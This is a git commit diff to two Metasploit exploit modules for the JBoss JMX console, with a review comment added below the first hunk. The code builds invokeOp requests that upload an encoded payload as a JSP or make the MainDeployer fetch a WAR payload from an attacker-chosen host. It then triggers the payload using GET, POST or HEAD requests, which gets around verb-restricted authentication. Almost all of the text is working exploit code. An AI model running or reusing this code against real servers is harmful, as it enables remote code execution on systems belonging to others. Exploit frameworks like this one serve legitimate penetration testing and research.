make sure to use correct verbs, thanks mc!

git-svn-id: file:///home/svn/framework3/trunk@9285 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Joshua Drake 2010-05-11 16:20:46 +00:00
parent 4cfc84a2e4
commit 711e08b5e9
2 changed files with 75 additions and 30 deletions


@ -67,21 +67,40 @@ class Metasploit3 < Msf::Exploit::Remote
fname = rand_text_alpha_upper(rand(5) + 1) fname = rand_text_alpha_upper(rand(5) + 1)
data = 'action=invokeOp'
data << '&name=jboss.admin%3Aservice%3DDeploymentFileRepository'
data << '&methodIndex=5'
data << '&arg0=' + Rex::Text.uri_encode(datastore['PATH'])
data << '&arg1=' + fname
data << '&arg2=.jsp'
data << '&arg3=' + Rex::Text.uri_encode(payload.encoded)
data << '&arg4=True'
if (datastore['VERB'] == "POST")
res = send_request_cgi( res = send_request_cgi(
{ {
'uri' => '/jmx-console/HtmlAdaptor', 'uri' => '/jmx-console/HtmlAdaptor',
'method' => datastore['VERB'], 'method' => datastore['VERB'],
'data' => 'action=invokeOp&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodIndex=5&arg0=' + 'data' => data
Rex::Text.uri_encode(datastore['PATH']) + '&arg1=' + fname + '&arg2=.jsp&arg3=' +
Rex::Text.uri_encode(payload.encoded) + '&arg4=True',
}) })
else
res = send_request_cgi(
{
'uri' => '/jmx-console/HtmlAdaptor;index.jsp?' + data,
'method' => datastore['VERB'],
})
end
if (res.code == 200) if (res.code == 200)
print_status("Triggering payload at '#{datastore['URI']}#{fname}.jsp'...") print_status("Triggering payload at '#{datastore['URI']}#{fname}.jsp'...")
verb = 'GET'
if (datastore['VERB'] != 'GET' and datastore['VERB'] != 'POST')
verb = 'HEAD'
end
send_request_raw( send_request_raw(
{ {
'uri' => datastore['URI'] + fname + '.jsp', 'uri' => datastore['URI'] + fname + '.jsp',
'method' => 'GET', 'method' => verb,
}) })
else else
print_error("Denied...") print_error("Denied...")
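Review bot: `res.code` is read right after the new if/else with no nil check, so a request that gets no response would presumably raise NoMethodError instead of reporting the failure; the other file in this commit guards the same kind of call with `if (! res)`. Changing the test to `if (res and res.code == 200)` lets the no-response case fall through to the existing `print_error` branch. The verb-selection lines (`verb = 'GET'` through `verb = 'HEAD'`) are repeated verbatim in the second file and carry no comment; a one-line comment stating why any VERB other than GET or POST is mapped to HEAD for the follow-up request would help the next maintainer. The enclosing method begins and ends outside this hunk.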


@ -73,6 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote
OptString.new('PASSWORD', [ false, 'The password for the specified username' ]), OptString.new('PASSWORD', [ false, 'The password for the specified username' ]),
OptString.new('PATH', [ true, 'The URI path of the console', '/jmx-console' ]), OptString.new('PATH', [ true, 'The URI path of the console', '/jmx-console' ]),
OptString.new('VERB', [ true, 'The HTTP verb to use', 'POST' ]), OptString.new('VERB', [ true, 'The HTTP verb to use', 'POST' ]),
OptString.new('WARHOST', [ false, 'The host to request the WAR payload from' ]),
], self.class) ], self.class)
end end
@ -149,7 +150,12 @@ class Metasploit3 < Msf::Exploit::Remote
'Path' => resource_uri 'Path' => resource_uri
}}) }})
print_status("Making the request to the MainDeployer...") if (datastore['WARHOST'])
service_url = 'http://' + datastore['WARHOST'] + ':' + datastore['SRVPORT'] + resource_uri
end
#method_index = jboss_detect_method_index
print_status("Asking the JBoss server to deploy (via MainDeployer) #{service_url}")
if (datastore['VERB'] == "POST")
res = send_request_cgi({ res = send_request_cgi({
'method' => datastore['VERB'], 'method' => datastore['VERB'],
'uri' => datastore['PATH'] + '/HtmlAdaptor', 'uri' => datastore['PATH'] + '/HtmlAdaptor',
@ -163,7 +169,23 @@ class Metasploit3 < Msf::Exploit::Remote
#'methodIndex' => '23', # jboss 3.2.7 #'methodIndex' => '23', # jboss 3.2.7
'arg0' => service_url 'arg0' => service_url
} }
}, 20) })
else
res = send_request_cgi({
'method' => datastore['VERB'],
'uri' => datastore['PATH'] + '/HtmlAdaptor',
'vars_get' =>
{
'action' => 'invokeOp',
'name' => 'jboss.system:service=MainDeployer',
# deploy via java.net.URL
'methodIndex' => '3', # jboss 4.0.5
#'methodIndex' => '21', # jboss 3.0.8
#'methodIndex' => '23', # jboss 3.2.7
'arg0' => service_url
}
})
end
if (! res) if (! res)
raise RuntimeError, "Unable to deploy WAR archive [No Response]" raise RuntimeError, "Unable to deploy WAR archive [No Response]"
end end
@ -194,9 +216,13 @@ class Metasploit3 < Msf::Exploit::Remote
# EXECUTE # EXECUTE
# #
print_status("Executing #{app_base}...") print_status("Executing #{app_base}...")
verb = 'GET'
if (datastore['VERB'] != 'GET' and datastore['VERB'] != 'POST')
verb = 'HEAD'
end
res = send_request_cgi({ res = send_request_cgi({
'uri' => '/' + app_base + '/' + jsp_name + '.jsp', 'uri' => '/' + app_base + '/' + jsp_name + '.jsp',
'method' => 'GET' 'method' => verb
}, 20) }, 20)
if (! res) if (! res)